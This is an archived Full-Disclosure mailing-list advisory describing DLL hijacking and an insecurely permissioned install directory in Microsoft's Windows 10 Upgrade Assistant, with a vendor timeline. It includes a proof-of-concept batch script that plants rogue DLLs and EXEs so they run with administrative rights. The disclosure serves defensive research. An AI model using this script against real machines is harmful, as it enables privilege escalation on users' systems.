lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Thu, 11 Aug 2016 19:54:48 +0200
From: "Stefan Kanthak" <stefan.kanthak@...go.de>
To: <fulldisclosure@...lists.org>
Cc: bugtraq@...urityfocus.com
Subject: [FD] Executable installers are vulnerable^WEVIL (case 38):
	Microsoft's Windows10Upgrade*.exe allows elevation of privilege

Hi @ll,

the "Windows 10 Upgrade Assistant" Windows10Upgrade*.exe,
available via <http://go.microsoft.com/fwlink/?LinkId=822783> on
<https://www.microsoft.com/en-us/accessibility/windows10upgrade>, 
via <http://go.microsoft.com/fwlink/?LinkId=821403> on
<https://support.microsoft.com/en-us/help/12387/windows-10-update-history>,
and on <https://www.microsoft.com/en-us/software-download/windows10>,

1. is vulnerable DLL hijacking
   (see <https://cwe.mitre.org/data/definitions/426.html>
   and <https://cwe.mitre.org/data/definitions/427.html>
   for this WELL-KNOWN vulnerability);

2. creates an unsafe directory "C:\Windows10Upgrade\"
   (see <https://cwe.mitre.org/data/definitions/277.html>
   and <https://cwe.mitre.org/data/definitions/732.html>
   for this WELL-KNOWN vulnerability).

Both vulnerabilities allow arbitrary code execution WITH
elevation of privilege!


Ad 1.:
~~~~~~

Applications which are offered as downloads to unsuspecting users
will typically be saved into the users "Downloads" directory ...
which is but a digital minefield: see
<https://insights.sei.cmu.edu/cert/2008/09/carpet-bombing-and-directory-poisoning.html>,
<http://blog.acrossecurity.com/2012/02/downloads-folder-binary-planting.html>
and <http://seclists.org/fulldisclosure/2012/Aug/134>

On a fully patched Windows 7 SP1, Windows10Upgrade*.exe loads
and executes the following DLLs from its "application directory"
(which typically happens to be the users "Downloads" directory):
    cabinet.dll, version.dll, propsys.dll, ntmarta.dll,
    linkinfo.dll, ntshrui.dll, srvcli.dll, cscapi.dll,
    slc.dll, secur32.dll, netutils.dll

On other versions of Windows the list of DLLs may vary.

Since its application manifest specifies "requireAdministrator",
Windows10Upgrade*.exe runs with administrative privileges: all
DLLs it loads and executes run with administrative privileges
too, resulting in arbitrary code execution WITH elevation of
privilege.

If an attacker is able to place the DLLs named above per "drive-by
download" in the users "Downloads" directory this becomes a remote
code execution WITH elevation of privilege.


Ad 2.:
~~~~~~

Upon execution Windows10Upgrade*.exe creates the directory
"C:\Windows10Upgrade\", extracts its payload into it, creates
a shortcut "Windows 10 Upgrade Assistant" in the start menu and
finally starts "C:\Windows10Upgrade\Windows10UpgraderApp.exe"
with administrative privleges.

The (inherited) NTFS permissions of the directory
"C:\Windows10Upgrade\"

   D:AI(A;OICIID;FA;;;BA)(A;OICIID;FA;;;SY)(A;OICIID;0x1200a9;;;BU)(A;OICIID;0x1301bf;;;AU)

   BUILTIN\Administrators: full access
   NT AUTHORITY\SYSTEM:    full access
   BUILTIN\Users:          read, execute
   NT AUTHORITY\Authenticated Users: read, write, execute, delete

allow UNPRIVILEGED users to (over)write files in this directory,
for example using the following batch script (the "rogue"
binaries sentinel.exe and sentinel.dll are available from
<http://home.arcor.de/skanthak/sentinel.html>):

--- poc.cmd ---
:WAIT
@If Not Exist "%SystemDrive%\Windows10Upgrade" Goto :WAIT

Copy sentinel.exe "%SystemDrive%\Windows10Upgrade\HTTPHelper.exe"
Copy sentinel.dll "%SystemDrive%\Windows10Upgrade\DXGIDebug.dll"
Copy sentinel.dll "%SystemDrive%\Windows10Upgrade\MSACM32.drv"

For %%! In (mfc42u, odbc32, version, winhttp, webio, xmllite,
            cryptsp, rpcrtremote, api-ms-win-downlevel-shlwapi-l2-1-0,
            sxs, propsys, apphelp, secur32, uxtheme, msls31, oleacc,
            d2d1, dwrite, dxgi, dwmapi, dxgidebug, d3d11, d3d10warp,
            mlang, winmm, slc, iphlpapi, dnsapi, dhcpcsvc, midimap,
            wer) Do Copy sentinel.dll "%SystemDrive%\Windows10Upgrade\%%!.dll"
--- EOF ---

"C:\Windows10Upgrade\Windows10UpgraderApp.exe" loads and executes
these DLLs and EXEs with administrative rights, again resulting in
elevation of privilege.


stay tuned
Stefan Kanthak


Timeline:
~~~~~~~~~

2016-08-03    vulnerability report sent to vendor

2016-08-05    vendor replies:
              "We won't be creating an MSRC case for this."

2016-08-11    report published

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ